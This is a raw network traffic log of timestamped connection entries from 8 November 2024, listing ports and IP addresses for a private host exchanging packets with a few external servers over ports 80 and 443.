Nov 8, 2024 16:15:36.427326918 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.427408934 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.427680969 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.427706003 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.427712917 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.427719116 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.431233883 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.431266069 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.431328058 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.431590080 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.431602001 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.517997026 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.518151045 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.518281937 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.518415928 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.518444061 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.518459082 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.518465042 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.521389961 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.521456003 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.521564007 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.521739006 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.521754026 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.533638954 CET	443	49778	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.533721924 CET	443	49778	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.533791065 CET	49778	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.534404993 CET	49778	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.537750006 CET	49771	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.539208889 CET	49785	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.543082952 CET	80	49771	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:36.543143034 CET	49771	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.544038057 CET	80	49785	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:36.544214964 CET	49785	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.544214964 CET	49785	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.548973083 CET	80	49785	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:36.828397036 CET	80	49779	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:36.829647064 CET	49786	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.829694986 CET	443	49786	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.829833984 CET	49786	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.830220938 CET	49786	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.830234051 CET	443	49786	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.876892090 CET	49779	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.878201962 CET	80	49779	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:36.878259897 CET	49779	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:37.113423109 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.113924980 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.113945007 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.114384890 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.114388943 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.146982908 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.147458076 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.147475004 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.147876978 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.147929907 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.147938013 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.148279905 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.148288965 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.148690939 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.148695946 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.173765898 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.174350977 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.174366951 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.174933910 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.174938917 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.175915956 CET	80	49785	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:37.177280903 CET	49788	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.177320957 CET	443	49788	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.177468061 CET	49788	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.177686930 CET	49788	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.177705050 CET	443	49788	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.220693111 CET	49785	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:37.243803024 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.244184971 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.244781971 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.244781971 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.244980097 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.244997978 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.247546911 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.247591019 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.247827053 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.247874975 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.247888088 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.258069038 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.258497953 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.258524895 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.259028912 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.259035110 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.279515982 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.279584885 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.279774904 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.279881954 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.279881954 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.279897928 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.279906034 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.281547070 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.281781912 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.282363892 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.282399893 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.282418966 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.282433987 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.282438993 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.283042908 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.283077955 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.283328056 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.283571959 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.283582926 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.284646988 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.284683943 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.284754038 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.284881115 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.284894943 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.306566954 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.306628942 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.306698084 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.306920052 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.306937933 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.306953907 CET	49783	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.306958914 CET	443	49783	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.309511900 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.309559107 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.309837103 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.310077906 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.310090065 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.391012907 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.391079903 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.391684055 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.391732931 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.391755104 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.391767979 CET	49784	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.391773939 CET	443	49784	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.394412041 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.394454956 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.394659042 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.394908905 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:37.394928932 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:37.437643051 CET	443	49786	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.439171076 CET	49786	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.439214945 CET	443	49786	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.586546898 CET	443	49786	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.586663961 CET	443	49786	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.586716890 CET	49786	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.587606907 CET	49786	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.595349073 CET	49779	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:37.596878052 CET	49794	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:37.600867987 CET	80	49779	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:37.600920916 CET	49779	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:37.602073908 CET	80	49794	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:37.602138996 CET	49794	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:37.603794098 CET	49794	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:37.608710051 CET	80	49794	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:37.784176111 CET	443	49788	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.785917044 CET	49788	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.785939932 CET	443	49788	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.933577061 CET	443	49788	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.933687925 CET	443	49788	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:37.933743954 CET	49788	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:37.934463978 CET	49788	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:38.001245022 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.005655050 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.005676031 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.006223917 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.006230116 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.014673948 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.015499115 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.015535116 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.016036987 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.016042948 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.021167040 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.022105932 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.022118092 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.022594929 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.022600889 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.041130066 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.071171045 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.071202993 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.072360039 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.072365999 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.123234034 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.123694897 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.123723030 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.124130011 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.124135017 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.137824059 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.137943029 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.137989044 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.138155937 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.138174057 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.138183117 CET	49789	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.138190031 CET	443	49789	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.140922070 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.140980005 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.141048908 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.141206026 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.141216040 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.146044016 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.146270990 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.146320105 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.146364927 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.146379948 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.146389961 CET	49790	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.146395922 CET	443	49790	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.148741007 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.148767948 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.148828983 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.149046898 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.149063110 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.150583029 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.150827885 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.150876999 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.150917053 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.150926113 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.150939941 CET	49791	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.150943041 CET	443	49791	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.153419971 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.153435946 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.153486013 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.153635979 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.153646946 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.196636915 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.196733952 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.196780920 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.196929932 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.196954966 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.196968079 CET	49792	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.196974039 CET	443	49792	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.200439930 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.200498104 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.200566053 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.200834990 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.200853109 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.242852926 CET	80	49794	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:38.244529963 CET	49800	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:38.244601011 CET	443	49800	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:38.244664907 CET	49800	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:38.244966030 CET	49800	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:38.244982958 CET	443	49800	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:38.254090071 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.255069971 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.255124092 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.255189896 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.255212069 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.255229950 CET	49793	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.255237103 CET	443	49793	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.258297920 CET	49801	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.258343935 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.258425951 CET	49801	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.258618116 CET	49801	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.258634090 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.283169985 CET	49794	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:38.870394945 CET	443	49800	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:38.877737999 CET	49800	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:38.877796888 CET	443	49800	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:38.943521023 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.944122076 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.944143057 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.944725037 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.944765091 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.944772959 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.945003986 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.945015907 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.946048021 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.946101904 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.946110964 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.946468115 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.946505070 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.946985960 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.946990967 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.948259115 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.948791027 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.948807955 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.949187994 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.949193001 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.993041992 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.994019985 CET	49801	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.994019985 CET	49801	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:38.994048119 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:38.994062901 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.033620119 CET	443	49800	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:39.033740997 CET	443	49800	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:39.033941031 CET	49800	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:39.034569979 CET	49800	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:39.038197041 CET	49794	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:39.039570093 CET	49803	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:39.043621063 CET	80	49794	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:39.043718100 CET	49794	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:39.044397116 CET	80	49803	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:39.044506073 CET	49803	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:39.044595003 CET	49803	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:39.049478054 CET	80	49803	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:39.072639942 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.073113918 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.073179960 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.073636055 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.073692083 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.076527119 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.076818943 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.076818943 CET	49799	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.076833963 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.076843023 CET	443	49799	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.076858044 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.076858044 CET	49797	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.076863050 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.076870918 CET	443	49797	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.081273079 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.081321955 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.082181931 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.082204103 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.082277060 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.082345963 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.082478046 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.082488060 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.082518101 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.082528114 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.082760096 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.083112955 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.083362103 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.083362103 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.083576918 CET	49798	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.083595037 CET	443	49798	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.086234093 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.086251974 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.090239048 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.094192028 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.094199896 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.098031044 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.098582983 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.098762989 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.098763943 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.098795891 CET	49796	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.098803997 CET	443	49796	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.102351904 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.102366924 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.102566004 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.102566004 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.102586031 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.122550011 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.122612000 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.122761011 CET	49801	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.122852087 CET	49801	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.122852087 CET	49801	443	192.168.2.10	13.107.246.45
